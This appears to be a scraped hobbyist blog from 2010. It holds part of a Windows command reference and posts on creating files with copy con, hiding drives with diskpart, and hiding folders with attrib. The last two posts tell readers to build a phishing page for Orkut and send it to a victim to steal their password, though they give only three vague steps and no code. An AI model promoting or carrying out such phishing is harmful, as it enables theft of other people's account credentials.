  TASKKILL Remove a running process from memory
  TIME Display or set the system time•
  TIMEOUT Delay processing of a batch file
  TITLE Set the window title for a CMD.EXE session•
  TLIST Task list with full path
  TOUCH Change file timestamps
  TRACERT Trace route to a remote host
  TREE Graphical display of folder structure
  TYPE Display the contents of a text file•
u
  USRSTAT List domain usernames and last login
v
  VER Display version information•
  VERIFY Verify that files have been saved•
  VOL Display a disk label•
w
  WHERE Locate and display files in a directory tree
  WHOAMI Output the current UserName and domain
  WINDIFF Compare the contents of two files or sets of files
  WINMSD Windows system diagnostics
  WINMSDP Windows system diagnostics II
  WMIC WMI Commands
x
  XCACLS Change file and folder permissions
  XCOPY Copy files and folders
  :: Comment / Remark•

how to create a txt file from dos.

helllo frends , this artical is important for those who are interseted in dos
today i teach u how to create a txt file from dos

copy con myfile.txt

When typing the above you will return down one line to a blank line. Create the file line by line. Once you are ready to create the file press enter to get to a blank line and then press and hold CTRL and press Z then let go of both buttons. This will return a ^Z. Once this has been entered press enter to save and exit the file.


Monday, May 31, 2010

How to hide/unhide drives in your operating system

HELLO FRENDS WELCOME AGAIN IN MY BLOG..TODAY I WILL TEACH  YOU HOW TO HIDE DRIVES IN UR OPERATING SYSTEM WITH OUT ANY SOFTWARE...
IT TAKES SOME STEPS , I WILL EXPLAIN  U ONE BY ONE
STEP1:-
1. Go to Start — > Run –> Cmd open command prompt.

2. Type diskpart in the command prompt, now diskpart session opens.

3. Type list volume and press enter.



4. You can see list of volume and Letters for the Volume.

5. Now select a volume for example type select volume 3 you can get a message volume 3 is selected.

6. Type remove letter F (Note : you should type current volume letter only)



7. Now F drive is hided, just need to restart the machine.



8. To Recover the Volume letter F follow the above procedure up to step 5.

9. Now type assign letter F and restart your machine.



10. Your hidden drive is rolled back.

Sunday, May 2, 2010

how to unhide/unlock the folder without any softeware

hello frends , today i teach you how to unhide / unlock the folder without any software , its realy works!!!

STEP 1. go to start option in ur operating system.
STEP 2. now click on run option and then type cmd .
STEP 3. after that type the name of ur drive in which ur folder is present (hide thid folder).
for e.g type c: (drive name).
STEP 4. now type attrib -s -h -r (name of the folder u want to hide).
STEP 5. thats it , ur folder is now unhide/unlock and can  seen by any one enjoyyyy!!!!

how to lock/hide folder without any software

hello frends , today i teach you how to hide / lock the folder without any software , its realy works!!!

STEP 1.  go to start option in ur operating system.
STEP 2. now click on run option and then type cmd .
STEP 3. after that type the name of ur drive in which ur folder is present (hide thid folder).
for e.g type c: (drive name).
STEP 4. now type attrib +s +h +r (name of the folder u want to hide).
STEP 5. thats it , ur folder is now hide/lock and can not seen by any one  enjoyyyy!!!!

if u like my trick so, plzz comment !!!  

Sunday, April 4, 2010

hacking orkut password

hello frends iam sumit doing b.tech in computer science ..this is my first blog ,please read and rated it.

now i will tell u how to hack orkut password without any software,

it takes only three steps to hack someone password in orkut

1. the first step is to create a phishering page for orkut.

2. the second step is to send this page link to the victm.

3. last step is when victm sign in this page , he/she will b hacked.


hacking orkut without any software

hacking

hello frends iam sumit a b.tech computer science student..this is my first blog

this article contain the information how to hack orkut account password without any software

dont worry frends i teach u how to hack

the first step is

create an phishering page for orkut

then use this page to cracke the password of the victm